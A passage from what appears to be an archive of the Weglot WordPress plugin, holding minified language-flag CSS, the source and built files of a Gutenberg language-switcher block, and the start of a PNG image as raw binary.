!important}.weglot-flags.flag-2.yi>a:before,.weglot-flags.flag-2.yi>span:before{background-position:-1992px 0 !important}.weglot-flags.flag-2.yo>a:before,.weglot-flags.flag-2.yo>span:before{background-position:-1103px 0 !important}.weglot-flags.flag-2.zu>a:before,.weglot-flags.flag-2.zu>span:before{background-position:-4968px 0 !important}.weglot-flags.flag-3.hw>a:before,.weglot-flags.flag-3.hw>span:before{background-position:-2711px 0 !important}.weglot-flags.flag-3.fl>a:before,.weglot-flags.flag-3.fl>span:before{background-position:-5232px 0 !important}.weglot-flags.flag-3.af>a:before,.weglot-flags.flag-3.af>span:before{background-position:-5496px 0 !important}.weglot-flags.flag-3.sq>a:before,.weglot-flags.flag-3.sq>span:before{background-position:-4776px 0 !important}.weglot-flags.flag-3.am>a:before,.weglot-flags.flag-3.am>span:before{background-position:-192px 0 !important}.weglot-flags.flag-3.ar>a:before,.weglot-flags.flag-3.ar>span:before{background-position:-3336px 0 !important}.weglot-flags.flag-3.hy>a:before,.weglot-flags.flag-3.hy>span:before{background-position:-4632px 0 !important}.weglot-flags.flag-3.az>a:before,.weglot-flags.flag-3.az>span:before{background-position:-4536px 0 !important}.weglot-flags.flag-3.ba>a:before,.weglot-flags.flag-3.ba>span:before{background-position:-2664px 0 !important}.weglot-flags.flag-3.eu>a:before,.weglot-flags.flag-3.eu>span:before{background-position:-5808px 0 !important}.weglot-flags.flag-3.be>a:before,.weglot-flags.flag-3.be>span:before{background-position:-144px 0 !important}.weglot-flags.flag-3.bn>a:before,.weglot-flags.flag-3.bn>span:before{background-position:-4488px 0 !important}.weglot-flags.flag-3.bs>a:before,.weglot-flags.flag-3.bs>span:before{background-position:-4392px 0 !important}.weglot-flags.flag-3.bg>a:before,.weglot-flags.flag-3.bg>span:before{background-position:-4296px 0 !important}.weglot-flags.flag-3.br>a:before,.weglot-flags.flag-3.br>span:before{background-position:-4344px 0 !important}.weglot-flags.flag-3.my>a:before,.weglot-flags.flag-3.my>span:before{background-position:-3769px 0 !important}.weglot-flags.flag-3.ca>a:before,.weglot-flags.flag-3.ca>span:before{background-position:-5784px 0 !important}.weglot-flags.flag-3.zh>a:before,.weglot-flags.flag-3.zh>span:before{background-position:-3240px 0 !important}.weglot-flags.flag-3.tw>a:before,.weglot-flags.flag-3.tw>span:before{background-position:-4008px 0 !important}.weglot-flags.flag-3.km>a:before,.weglot-flags.flag-3.km>span:before{background-position:-4201px 0 !important}.weglot-flags.flag-3.ny>a:before,.weglot-flags.flag-3.ny>span:before{background-position:-384px 0 !important}.weglot-flags.flag-3.co>a:before,.weglot-flags.flag-3.co>span:before{background-position:-2760px 0 !important}.weglot-flags.flag-3.hr>a:before,.weglot-flags.flag-3.hr>span:before{background-position:-3048px 0 !important}.weglot-flags.flag-3.cs>a:before,.weglot-flags.flag-3.cs>span:before{background-position:-5280px 0 !important}.weglot-flags.flag-3.da>a:before,.weglot-flags.flag-3.da>span:before{background-position:-3024px 0 !important}.weglot-flags.flag-3.nl>a:before,.weglot-flags.flag-3.nl>span:before{background-position:-3360px 0 !important}.weglot-flags.flag-3.en>a:before,.weglot-flags.flag-3.en>span:before{background-position:-2520px 0 !important}.weglot-flags.flag-3.eo>a:before,.weglot-flags.flag-3.eo>span:before{background-position:-2520px 0 !important}.weglot-flags.flag-3.et>a:before,.weglot-flags.flag-3.et>span:before{background-position:-2856px 0 !important}.weglot-flags.flag-3.fj>a:before,.weglot-flags.flag-3.fj>span:before{background-position:-0px 0 !important}.weglot-flags.flag-3.fi>a:before,.weglot-flags.flag-3.fi>span:before{background-position:-2784px 0 !important}.weglot-flags.flag-3.fr>a:before,.weglot-flags.flag-3.fr>span:before{background-position:-2760px 0 !important}.weglot-flags.flag-3.gl>a:before,.weglot-flags.flag-3.gl>span:before{background-position:-5832px 0 !important}.weglot-flags.flag-3.ka>a:before,.weglot-flags.flag-3.ka>span:before{background-position:-1536px 0 !important}.weglot-flags.flag-3.de>a:before,.weglot-flags.flag-3.de>span:before{background-position:-1488px 0 !important}.weglot-flags.flag-3.el>a:before,.weglot-flags.flag-3.el>span:before{background-position:-1416px 0 !important}.weglot-flags.flag-3.gu>a:before,.weglot-flags.flag-3.gu>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.ht>a:before,.weglot-flags.flag-3.ht>span:before{background-position:-5160px 0 !important}.weglot-flags.flag-3.ha>a:before,.weglot-flags.flag-3.ha>span:before{background-position:-361px 0 !important}.weglot-flags.flag-3.he>a:before,.weglot-flags.flag-3.he>span:before{background-position:-1608px 0 !important}.weglot-flags.flag-3.hi>a:before,.weglot-flags.flag-3.hi>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.hu>a:before,.weglot-flags.flag-3.hu>span:before{background-position:-1920px 0 !important}.weglot-flags.flag-3.is>a:before,.weglot-flags.flag-3.is>span:before{background-position:-840px 0 !important}.weglot-flags.flag-3.ig>a:before,.weglot-flags.flag-3.ig>span:before{background-position:-3457px 0 !important}.weglot-flags.flag-3.id>a:before,.weglot-flags.flag-3.id>span:before{background-position:-4992px 0 !important}.weglot-flags.flag-3.ga>a:before,.weglot-flags.flag-3.ga>span:before{background-position:-2016px 0 !important}.weglot-flags.flag-3.it>a:before,.weglot-flags.flag-3.it>span:before{background-position:-336px 0 !important}.weglot-flags.flag-3.ja>a:before,.weglot-flags.flag-3.ja>span:before{background-position:-2448px 0 !important}.weglot-flags.flag-3.jv>a:before,.weglot-flags.flag-3.jv>span:before{background-position:-864px 0 !important}.weglot-flags.flag-3.kn>a:before,.weglot-flags.flag-3.kn>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.kk>a:before,.weglot-flags.flag-3.kk>span:before{background-position:-3912px 0 !important}.weglot-flags.flag-3.ko>a:before,.weglot-flags.flag-3.ko>span:before{background-position:-2256px 0 !important}.weglot-flags.flag-3.ku>a:before,.weglot-flags.flag-3.ku>span:before{background-position:-1920px 0 !important}.weglot-flags.flag-3.ky>a:before,.weglot-flags.flag-3.ky>span:before{background-position:-744px 0 !important}.weglot-flags.flag-3.lo>a:before,.weglot-flags.flag-3.lo>span:before{background-position:-3816px 0 !important}.weglot-flags.flag-3.la>a:before,.weglot-flags.flag-3.la>span:before{background-position:-336px 0 !important}.weglot-flags.flag-3.lv>a:before,.weglot-flags.flag-3.lv>span:before{background-position:-216px 0 !important}.weglot-flags.flag-3.lt>a:before,.weglot-flags.flag-3.lt>span:before{background-position:-1776px 0 !important}.weglot-flags.flag-3.lb>a:before,.weglot-flags.flag-3.lb>span:before{background-position:-1945px 0 !important}.weglot-flags.flag-3.mk>a:before,.weglot-flags.flag-3.mk>span:before{background-position:-2208px 0 !important}.weglot-flags.flag-3.mg>a:before,.weglot-flags.flag-3.mg>span:before{background-position:-5064px 0 !important}.weglot-flags.flag-3.ms>a:before,.weglot-flags.flag-3.ms>span:before{background-position:-864px 0 !important}.weglot-flags.flag-3.ml>a:before,.weglot-flags.flag-3.ml>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.mt>a:before,.weglot-flags.flag-3.mt>span:before{background-position:-4920px 0 !important}.weglot-flags.flag-3.mi>a:before,.weglot-flags.flag-3.mi>span:before{background-position:-2113px 0 !important}.weglot-flags.flag-3.mr>a:before,.weglot-flags.flag-3.mr>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.mn>a:before,.weglot-flags.flag-3.mn>span:before{background-position:-24px 0 !important}.weglot-flags.flag-3.ne>a:before,.weglot-flags.flag-3.ne>span:before{background-position:-5642px 0 !important}.weglot-flags.flag-3.no>a:before,.weglot-flags.flag-3.no>span:before{background-position:-984px 0 !important}.weglot-flags.flag-3.ps>a:before,.weglot-flags.flag-3.ps>span:before{background-position:-4753px 0 !important}.weglot-flags.flag-3.fa>a:before,.weglot-flags.flag-3.fa>span:before{background-position:-816px 0 !important}.weglot-flags.flag-3.pl>a:before,.weglot-flags.flag-3.pl>span:before{background-position:-4944px 0 !important}.weglot-flags.flag-3.pt>a:before,.weglot-flags.flag-3.pt>span:before{background-position:-3504px 0 !important}.weglot-flags.flag-3.pa>a:before,.weglot-flags.flag-3.pa>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.ro>a:before,.weglot-flags.flag-3.ro>span:before{background-position:-3744px 0 !important}.weglot-flags.flag-3.ru>a:before,.weglot-flags.flag-3.ru>span:before{background-position:-2664px 0 !important}.weglot-flags.flag-3.sm>a:before,.weglot-flags.flag-3.sm>span:before{background-position:-1248px 0 !important}.weglot-flags.flag-3.gd>a:before,.weglot-flags.flag-3.gd>span:before{background-position:-3841px 0 !important}.weglot-flags.flag-3.sr>a:before,.weglot-flags.flag-3.sr>span:before{background-position:-3312px 0 !important}.weglot-flags.flag-3.sn>a:before,.weglot-flags.flag-3.sn>span:before{background-position:-5521px 0 !important}.weglot-flags.flag-3.sd>a:before,.weglot-flags.flag-3.sd>span:before{background-position:-1993px 0 !important}.weglot-flags.flag-3.si>a:before,.weglot-flags.flag-3.si>span:before{background-position:-2833px 0 !important}.weglot-flags.flag-3.sk>a:before,.weglot-flags.flag-3.sk>span:before{background-position:-552px 0 !important}.weglot-flags.flag-3.sl>a:before,.weglot-flags.flag-3.sl>span:before{background-position:-936px 0 !important}.weglot-flags.flag-3.so>a:before,.weglot-flags.flag-3.so>span:before{background-position:-4032px 0 !important}.weglot-flags.flag-3.st>a:before,.weglot-flags.flag-3.st>span:before{background-position:-3961px 0 !important}.weglot-flags.flag-3.es>a:before,.weglot-flags.flag-3.es>span:before{background-position:-3576px 0 !important}.weglot-flags.flag-3.su>a:before,.weglot-flags.flag-3.su>span:before{background-position:-3985px 0 !important}.weglot-flags.flag-3.sw>a:before,.weglot-flags.flag-3.sw>span:before{background-position:-912px 0 !important}.weglot-flags.flag-3.sv>a:before,.weglot-flags.flag-3.sv>span:before{background-position:-264px 0 !important}.weglot-flags.flag-3.tl>a:before,.weglot-flags.flag-3.tl>span:before{background-position:-5232px 0 !important}.weglot-flags.flag-3.ty>a:before,.weglot-flags.flag-3.ty>span:before{background-position:-1512px 0 !important}.weglot-flags.flag-3.tg>a:before,.weglot-flags.flag-3.tg>span:before{background-position:-3720px 0 !important}.weglot-flags.flag-3.ta>a:before,.weglot-flags.flag-3.ta>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.tt>a:before,.weglot-flags.flag-3.tt>span:before{background-position:-2664px 0 !important}.weglot-flags.flag-3.te>a:before,.weglot-flags.flag-3.te>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-3.th>a:before,.weglot-flags.flag-3.th>span:before{background-position:-4848px 0 !important}.weglot-flags.flag-3.to>a:before,.weglot-flags.flag-3.to>span:before{background-position:-1680px 0 !important}.weglot-flags.flag-3.tr>a:before,.weglot-flags.flag-3.tr>span:before{background-position:-432px 0 !important}.weglot-flags.flag-3.uk>a:before,.weglot-flags.flag-3.uk>span:before{background-position:-5736px 0 !important}.weglot-flags.flag-3.ur>a:before,.weglot-flags.flag-3.ur>span:before{background-position:-1992px 0 !important}.weglot-flags.flag-3.uz>a:before,.weglot-flags.flag-3.uz>span:before{background-position:-2160px 0 !important}.weglot-flags.flag-3.vi>a:before,.weglot-flags.flag-3.vi>span:before{background-position:-3384px 0 !important}.weglot-flags.flag-3.cy>a:before,.weglot-flags.flag-3.cy>span:before{background-position:-5040px 0 !important}.weglot-flags.flag-3.fy>a:before,.weglot-flags.flag-3.fy>span:before{background-position:-3360px 0 !important}.weglot-flags.flag-3.xh>a:before,.weglot-flags.flag-3.xh>span:before{background-position:-5496px 0 !important}.weglot-flags.flag-3.yi>a:before,.weglot-flags.flag-3.yi>span:before{background-position:-1608px 0 !important}.weglot-flags.flag-3.yo>a:before,.weglot-flags.flag-3.yo>span:before{background-position:-3457px 0 !important}.weglot-flags.flag-3.zu>a:before,.weglot-flags.flag-3.zu>span:before{background-position:-5496px 0 !important}body div[id^="mega-menu-wrap"] #mega-menu-primary li.mega-menu-item.weglot-flags a.mega-menu-link:before{background-image:url("../../../app/images/rect_mate.png") !important;background-size:auto 20px !important;border-radius:0px !important;width:30px !important;height:20px !important;content:"";vertical-align:middle;margin-right:10px;display:inline-block;overflow:hidden}body div[id^="mega-menu-wrap"] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-1 .mega-menu-link:before{background-image:url("../../../app/images/rect_bright.png") !important}body div[id^="mega-menu-wrap"] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-2 .mega-menu-link:before{background-image:url("../../../app/images/square_flag.png") !important;width:24px !important;height:24px !important;background-size:auto 24px !important}body div[id^="mega-menu-wrap"] #mega-menu-primary li.mega-menu-item.weglot-flags.flag-3 .mega-menu-link:before{background-image:url("../../../app/images/circular_flag.png") !important;width:24px !important;height:24px !important;background-size:auto 24px !important}#wp-admin-bar-weglot>.ab-item{background-image:url("data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMDAiIGhlaWdodD0iMzAwIj48ZyBmaWxsPSIjYTBhNWFhIj48cGF0aCBkPSJNMjEuNzM5IDkyLjU2NWw1MS44MjggMTI5LjczMiAyMy42Ni02MC4yNzkgMjQuMTQ0IDYwLjI3OUwxNzMuMiA5Mi41NjVoLTI4LjAwN2wtMjMuODIyIDU4Ljc1LTIzLjkwMi01OC43NS0yMy45MDIgNTguNzUtMjMuOTAyLTU4Ljc1SDIxLjczOXoiLz48cGF0aCBkPSJNMjEwLjAwNiA5Mi43MWMtMTcuODY2IDAtMzMuMTU3IDYuMzU4LTQ1Ljg3MyAxOS4wNzQtMTIuNzE1IDEyLjcxNi0xOC45OTMgMjguMDA2LTE4Ljk5MyA0NS43OTIgMCAxNy44NjcgNi4yNzggMzMuMTU4IDE4Ljk5MyA0NS44NzMgMTIuNzE2IDEyLjcxNiAyOC4wMDcgMTguOTkzIDQ1Ljg3MyAxOC45OTMgMTcuNzg2IDAgMzMuMDc3LTYuMjc3IDQ1Ljc5My0xOC45OTMgMTIuNzE1LTEyLjcxNSAxOS4wNzMtMjguMDA2IDE5LjA3My00NS44NzMgMC00LjUwNy0uNDgzLTguODUyLTEuMjg4LTEyLjk1N2gtNjMuNTc4djI1LjkxNGgzNi42OTljLTIuNzM3IDcuNTY1LTcuNDg1IDEzLjg0My0xNC4wODQgMTguNjcxLTYuNjggNC44My0xNC4yNDUgNy4yNDQtMjIuNjE1IDcuMjQ0LTEwLjc4NCAwLTE5Ljk1OC0zLjc4My0yNy41MjMtMTEuMzQ4LTcuNTY2LTcuNTY1LTExLjM0OC0xNi43NC0xMS4zNDgtMjcuNTI0IDAtMTAuNjIzIDMuNzgyLTE5Ljc5OCAxMS4zNDgtMjcuNDQzIDcuNTY1LTcuNjQ1IDE2Ljc0LTExLjUwOCAyNy41MjMtMTEuNTA4IDEwLjYyMyAwIDE5Ljc5OCAzLjg2MyAyNy41MjQgMTEuNDI4bDE4LjM1LTE4LjM1YTY3Ljk2MyA2Ny45NjMgMCAwMC0yMC43NjQtMTMuODQyYy03Ljg4Ny0zLjM4LTE2LjI1Ny01LjE1LTI1LjExLTUuMTV6Ii8+PC9nPjwvc3ZnPg==") !important;-webkit-background-size:22px auto !important;background-size:22px auto !important;background-repeat:no-repeat !important;background-position:4px 5px !important;padding-left:30px !important}li.weglot-hide,.weglot-hide{display:none !important}.country-selector{z-index:9999;text-align:left;position:relative;display:inline-block;width:auto}.country-selector a{padding:0 10px;outline:none;text-decoration:none;float:none !important;white-space:nowrap;font-weight:normal;cursor:pointer;color:black;-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.country-selector a:focus{outline:none}.country-selector ul{padding:0px;z-index:1010;list-style:none;margin:0}.country-selector li{margin:0px;padding:0px}.country-selector.weglot-dropdown{background-color:white}.country-selector.weglot-dropdown a,.country-selector.weglot-dropdown span{display:block;height:37px;line-height:36px;font-size:13px;padding:0 10px;width:100%;-webkit-box-sizing:border-box;box-sizing:border-box;font-weight:normal}.country-selector.weglot-dropdown a:hover,.country-selector.weglot-dropdown span:hover{cursor:pointer}.country-selector.weglot-dropdown .wgcurrent{border:1px solid #e0e0e0;list-style:none;display:block;margin:0}.country-selector.weglot-dropdown .wgcurrent a,.country-selector.weglot-dropdown .wgcurrent span{padding-right:60px}.country-selector.weglot-dropdown .wgcurrent:after{display:inline-block;position:absolute;top:17px;right:8px;width:13px;height:7px;-ms-interpolation-mode:nearest-neighbor;image-rendering:-webkit-optimize-contrast;image-rendering:-moz-crisp-edges;image-rendering:-o-pixelated;image-rendering:pixelated;background:url("../../../app/images/wgarrowdown.png") no-repeat;content:"";-webkit-transition:all 200ms;-o-transition:all 200ms;transition:all 200ms;-webkit-transform:rotate(-90deg);-ms-transform:rotate(-90deg);transform:rotate(-90deg)}.country-selector.weglot-dropdown ul{position:absolute;min-width:100%;border:1px solid #ebeef0;background:white;left:0;top:initial;-webkit-box-sizing:border-box;box-sizing:border-box;display:none;padding:0}.country-selector.weglot-dropdown input:checked ~ ul{display:block}.country-selector.weglot-dropdown input:checked ~ .wgcurrent:after{-webkit-transform:rotate(0deg);-ms-transform:rotate(0deg);transform:rotate(0deg)}.country-selector.weglot-dropdown li{width:100%}.country-selector.weglot-dropdown.weglot-invert ul{bottom:38px}.country-selector.weglot-dropdown.weglot-invert input:checked ~ .wgcurrent:after{-webkit-transform:rotate(-180deg);-ms-transform:rotate(-180deg);transform:rotate(-180deg)}.country-selector.weglot-default{position:fixed;bottom:0px;right:40px}.country-selector.weglot-inline a:hover{text-decoration:underline;color:#00a0d2}.country-selector.weglot-inline .wgcurrent a{text-decoration:underline}.country-selector.weglot-inline label{margin-bottom:0;display:inline-block;vertical-align:middle}.country-selector.weglot-inline ul{display:inline-block;vertical-align:middle}.country-selector.weglot-inline li{line-height:1 !important;display:inline-block;margin:2px 0px;vertical-align:middle}.country-selector.weglot-inline.weglot-default{bottom:5px}.country-selector input{display:none !important}.navbar .navbar-nav li.weglot-flags a.weglot-lang:before{position:static;-webkit-transform:none;-ms-transform:none;transform:none;-webkit-transition:none;-o-transition:none;transition:none}.js .main-navigation .country-selector ul{display:none}html[dir="rtl"] .weglot-flags a:before,html[dir="rtl"] .weglot-flags span:before{margin-right:0;margin-left:10px}.weglot-flags>a:before,.weglot-flags>span.wglanguage-name:before{background-image:url("../../../app/images/rect_mate.png");-webkit-background-size:auto 20px !important;background-size:auto 20px !important;border-radius:0px !important;width:30px !important;height:20px !important;content:"";vertical-align:middle;margin-right:10px;display:inline-block;overflow:hidden}.weglot-flags.flag-1>a:before,.weglot-flags.flag-1>span:before{background-image:url("../../../app/images/rect_bright.png")}.weglot-flags.flag-2>a:before,.weglot-flags.flag-2>span:before{background-image:url("../../../app/images/square_flag.png");width:24px !important;height:24px !important;-webkit-background-size:auto 24px !important;background-size:auto 24px !important}.weglot-flags.flag-3 a:before,.weglot-flags.flag-3 span:before{background-image:url("../../../app/images/circular_flag.png");width:24px !important;height:24px !important;-webkit-background-size:auto 24px !important;background-size:auto 24px !important}.weglot-flags>a span:before{background-image:none !important;display:none !important}.weglot-flags>span a:before{background-image:none !important;display:none !important}
weglot-widget/src/style.scss000064400000000251151330373270012154 0ustar00/**
 * The following styles get applied both on the front of your site
 * and in the editor.
 *
 * Replace them with your own styles or remove the file completely.
 */

weglot-widget/src/edit.js000064400000002537151330373270011413 0ustar00/**
 * Retrieves the translation of text.
 *
 * @see https://developer.wordpress.org/block-editor/packages/packages-i18n/
 */
import {__} from '@wordpress/i18n';

/**
 * React hook that is used to mark the block wrapper element.
 * It provides all the necessary props like the class name.
 *
 * @see https://developer.wordpress.org/block-editor/packages/packages-block-editor/#useBlockProps
 */
import {useBlockProps} from '@wordpress/block-editor';
import ServerSideRender from '@wordpress/server-side-render';

/**
 * Internal dependencies
 */
import {blockStyle} from './index';

/**
 * Lets webpack process CSS, SASS or SCSS files referenced in JavaScript files.
 * Those files can contain any CSS code that gets applied to the editor.
 *
 * @see https://www.npmjs.com/package/@wordpress/scripts#using-css
 */
import './editor.scss';

/**
 * The edit function describes the structure of your block in the context of the
 * editor. This represents what the editor will render when the block is used.
 *
 * @see https://developer.wordpress.org/block-editor/developers/block-api/block-edit-save/#edit
 *
 * @return {WPElement} Element to render.
 */
export default function Edit(props) {
	const blockProps = useBlockProps();
	return (
		<div {...blockProps}>
			<ServerSideRender
				block="create-block/weglot-widget"
				attributes={props.attributes}
			/>
		</div>
	);
}
weglot-widget/src/block.json000064400000000646151330373270012114 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 2,
	"name": "create-block/weglot-widget",
	"version": "0.1.0",
	"title": "Weglot Widget",
	"category": "widgets",
	"icon": "smiley",
	"description": "Weglot switcher widget",
	"supports": {
		"html": true
	},
	"textdomain": "weglot-widget",
	"editorScript": "file:./index.js",
	"editorStyle": "file:./index.css",
	"style": "file:./style-index.css"
}
weglot-widget/src/index.js000064400000002134151330373270011566 0ustar00/**
 * Registers a new block provided a unique name and an object defining its behavior.
 *
 * @see https://developer.wordpress.org/block-editor/reference-guides/block-api/block-registration/
 */
import { registerBlockType } from '@wordpress/blocks';

/**
 * Lets webpack process CSS, SASS or SCSS files referenced in JavaScript files.
 * All files containing `style` keyword are bundled together. The code used
 * gets applied both to the front of your site and to the editor.
 *
 * @see https://www.npmjs.com/package/@wordpress/scripts#using-css
 */
import icons from './icons.js'

export const blockStyle = {
	backgroundColor: '#900',
	color: '#fff',
	padding: '20px',
};

/**
 * Internal dependencies
 */
import Edit from './edit';
import save from './save';

/**
 * Every block starts by registering a new block type definition.
 *
 * @see https://developer.wordpress.org/block-editor/reference-guides/block-api/block-registration/
 */
registerBlockType( 'create-block/weglot-widget', {
	icon: icons.weglot, // The Weglot icon
	/**
	 * @see ./edit.js
	 */
	edit: Edit,

	/**
	 * @see ./save.js
	 */
	save,
} );
weglot-widget/build/index.js000064400000010463151330373270012102 0ustar00!function(){"use strict";var L={n:function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return L.d(t,{a:t}),t},d:function(e,t){for(var n in t)L.o(t,n)&&!L.o(e,n)&&Object.defineProperty(e,n,{enumerable:!0,get:t[n]})},o:function(L,e){return Object.prototype.hasOwnProperty.call(L,e)}},e=window.wp.blocks,t=window.wp.element;const n={};n.weglot=(0,t.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,t.createElement)("path",{d:"M12.9831 0.0472697L13.4682 0.0945448L13.9462 0.164576L14.4172 0.250364L14.8829 0.355413L15.3417 0.477971L15.7916 0.618033L16.2346 0.775604L16.6706 0.950685L17.0961 1.14152L17.5146 1.34811L17.9208 1.56872L18.32 1.80508L18.7087 2.05719L19.0851 2.32331L19.4528 2.60344L19.803 2.89758L20.1532 3.20397L20.4859 3.52261L20.8046 3.85352L21.111 4.20368L21.4051 4.55384L21.6853 4.9215L21.9514 5.29793L22.2018 5.68661L22.4399 6.08404L22.6605 6.49197L22.8672 6.90867L23.0563 7.33586L23.2314 7.77006L23.3872 8.21302L23.529 8.66472L23.6516 9.12168L23.7566 9.5874L23.8424 10.0601L23.9107 10.5381L23.9597 11.0213L23.9895 11.5115L24 12.0053L23.9895 12.5007L23.9597 12.9892L23.9107 13.4724L23.8424 13.9521L23.7566 14.4231L23.6516 14.8888L23.529 15.3458L23.3872 15.7975L23.2314 16.2404L23.0563 16.6764L22.8672 17.1018L22.6605 17.5185L22.4399 17.9265L22.2018 18.3256L21.9514 18.7126L21.6853 19.089L21.4051 19.4567L21.111 19.8068L20.8046 20.157L20.4859 20.4896L20.1532 20.8083L19.803 21.1147L19.4528 21.4071L19.0851 21.6872L18.7087 21.9533L18.32 22.2037L17.9208 22.44L17.5146 22.6624L17.0961 22.8637L16.6706 23.0546L16.2346 23.2296L15.7916 23.3872L15.3417 23.5273L14.8829 23.6498L14.4172 23.7549L13.9462 23.8424L13.4682 23.9107L12.9831 23.9597L12.4946 23.9895L11.9991 24L11.5054 23.9895L11.0151 23.9597L10.5318 23.9142L10.0538 23.8459L9.58109 23.7584L9.1171 23.6533L8.65835 23.5308L8.20311 23.389L7.75837 23.2314L7.32415 23.0563L6.90392 22.8637L6.48545 22.6589L6.07748 22.4365L5.68002 22.2002L5.29306 21.9498L4.91486 21.6819L4.54717 21.4018L4.19698 21.1094L3.84679 20.803L3.51412 20.4844L3.19545 20.1517L2.88904 19.8016L2.59488 19.4514L2.31473 19.0837L2.04859 18.7056L1.79821 18.3186L1.56183 17.9195L1.33946 17.5115L1.13285 17.0948L0.943754 16.6694L0.768661 16.2334L0.612826 15.7905L0.472753 15.3388L0.348439 14.8818L0.243382 14.4161L0.157583 13.9451L0.0892992 13.4654L0.0402733 12.9822L0.0105052 12.4937L0 11.9983L0.0105052 11.5045L0.0402733 11.0143L0.0892992 10.5311L0.157583 10.0531L0.243382 9.58039L0.348439 9.11468L0.472753 8.65772L0.612826 8.20601L0.768661 7.76306L0.943754 7.32886L1.13285 6.90166L1.33946 6.48497L1.56183 6.07703L1.79821 5.6796L2.04859 5.29093L2.31473 4.9145L2.59488 4.54683L2.88904 4.19667L3.19545 3.84651L3.51412 3.51561L3.84679 3.19697L4.19698 2.89058L4.54717 2.59644L4.91486 2.31631L5.29306 2.05019L5.68002 1.79807L6.07748 1.56171L6.48545 1.34112L6.90392 1.13452L7.3294 0.94368L7.76363 0.7686L8.20836 0.611028L8.65835 0.470966L9.1171 0.348408L9.58109 0.243359L10.0538 0.157571L10.5318 0.0875401L11.0151 0.0402704L11.5054 0.00875188L11.9991 0L12.4946 0.00875188L12.9831 0.0472697Z",fill:"#18164C"}),(0,t.createElement)("path",{"fill-rule":"evenodd","clip-rule":"evenodd",d:"M13.1629 9.00676C14.0613 8.08877 15.1601 7.64917 16.4463 7.64917C17.6781 7.65415 18.8591 8.14147 19.7361 9.00676L18.424 10.3191C17.8617 9.77606 17.2089 9.49808 16.4592 9.49808C15.7171 9.48861 15.004 9.78563 14.4879 10.3191C13.945 10.8686 13.6735 11.528 13.6735 12.2908C13.6616 13.0323 13.9563 13.7457 14.4879 14.2626C15.1252 14.9082 16.0385 15.2003 16.9321 15.0442C17.8257 14.8881 18.5861 14.3038 18.967 13.4803H16.3558V11.7284H21.0546C21.2285 13.1474 20.7371 14.5672 19.7232 15.5749C18.8118 16.48 17.7131 16.939 16.4398 16.939C15.2057 16.9581 14.019 16.4641 13.1629 15.5749C12.2895 14.7137 11.8376 13.6744 11.8015 12.4513L9.9843 17.0943L8.26446 12.529L6.58987 17.0943L2.91095 7.71111H4.89589L6.58987 12.0563L8.29032 7.71111L9.9843 12.0563L11.6718 7.71111H13.6568L13.1415 9.02764C13.1486 9.02066 13.1557 9.0137 13.1629 9.00676Z",fill:"white"}));var o=n,r=(window.wp.i18n,window.wp.blockEditor),i=window.wp.serverSideRender,l=L.n(i);(0,e.registerBlockType)("create-block/weglot-widget",{icon:o.weglot,edit:function(L){const e=(0,r.useBlockProps)();return(0,t.createElement)("div",e,(0,t.createElement)(l(),{block:"create-block/weglot-widget",attributes:L.attributes}))},save:function(){return null}})}();weglot-widget/build/index.asset.php000064400000000257151330373270013373 0ustar00<?php return array('dependencies' => array('wp-block-editor', 'wp-blocks', 'wp-element', 'wp-i18n', 'wp-server-side-render'), 'version' => '250335267d04471980b70a2b0ba471d0');weglot-widget/build/block.json000064400000000646151330373270012424 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 2,
	"name": "create-block/weglot-widget",
	"version": "0.1.0",
	"title": "Weglot Widget",
	"category": "widgets",
	"icon": "smiley",
	"description": "Weglot switcher widget",
	"supports": {
		"html": true
	},
	"textdomain": "weglot-widget",
	"editorScript": "file:./index.js",
	"editorStyle": "file:./index.css",
	"style": "file:./style-index.css"
}
weglot-widget/build/images/rect_bright.93dd8032.png000064400000103470151330373270015764 0ustar00�PNG


IHDR ��aG��PLTE������(7$}�4����&4��/�+�&�Bz=jNu����+���)3�jA7��-�# �).��)9��y]�I���Q3{������Cf�:�
I�������@��s��J�V��*k��=()�)e�`#J�=��v����� b2gƣ08�}(x� �r��c�����H�L��<��<!B�����Y����K����/�(R���$7��&(�+-~�?4?�!]6�P���s��9|��!&�o=)�>�	/"B��	:u�r) �CQ��	����Z8\�����S��(f�l���,��䅌
+�<v)�����[�s�8Fӱ9������j��NWM���$(?Z��9�jj��0�*W��퐕C~��2H�5�
ڻ7����j���|������� 
��B1�pi?��HR7�3�����0�!N��pQ3͡�����(�(Nm��Ҥ}�,W�wzö���Ӫ�0�ٽ�l͢K��б����r��%9.ird�Xb��@}�t�������
t��X���M�/I�_�˼��X8Vo��O?
�XY��Á�ock|��tg��f���ː�\.��UC&�������]���ɸ���l�*��<���Ys6�|Q,n��^��/T�d!6Zqd��O��IDATx���k@T�7�e�
